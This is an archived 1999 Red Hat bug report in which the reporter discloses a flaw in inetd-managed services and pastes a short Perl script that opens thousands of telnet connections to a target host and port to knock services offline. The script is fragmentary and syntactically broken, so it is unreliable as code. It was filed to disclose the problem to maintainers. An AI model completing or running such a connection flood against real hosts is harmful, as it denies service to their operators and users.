Bug 4004 - need summary
need summary
Status: CLOSED DUPLICATE of bug 4005
Product: Red Hat Linux
Classification: Retired
Component: net-tools (Show other bugs)
i386 Linux
high Severity high
: ---
: ---
Assigned To: David Lawrence
Depends On:
  Show dependency treegraph
Reported: 1999-07-12 18:40 EDT by jjuarez
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 1999-07-13 10:22:37 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description jjuarez 1999-07-12 18:40:39 EDT
# Author: Jesus A. Juarez
#         Jul 1999
# e-mail: chuby@mail.com
# The Xploit attack to services under inetd daemon on the
# Linux  Box's, this cause the suspend of the services.
# The problem is on the inetd, telnet, ftp & sendmail, etc;
# daemon's, because this programs do not limit the number of
# calls by client. This causes that the service requested
# became down.
# Use it under your own risk.
# The TCP-WRAPPERS don't Fix this problem.
# Sintax:
#               DoS-TFS.pl <hostname> <port> <enter>
#               DoS-Telnet, FTP, Sendmail, etc.
# This code has beed tested from Linux to Linux Box's whith
# Perl  installed, I think'  that it run the same way on
# some Unix's or Windows System to damage some Linux Box's.
use Net::Telnet;
for ($i=0;$i<5000;$i++)
  $obj=Net::Telnet->new( Host => "$ARGV[0]",Port >
  my $cmd = ".";
#this problem will not be published.
# please notify me, when fix it. :)
Comment 1 Bill Nottingham 1999-07-13 10:22:59 EDT
*** This bug has been marked as a duplicate of 4005 ***

Note You need to log in before you can comment on or make changes to this bug.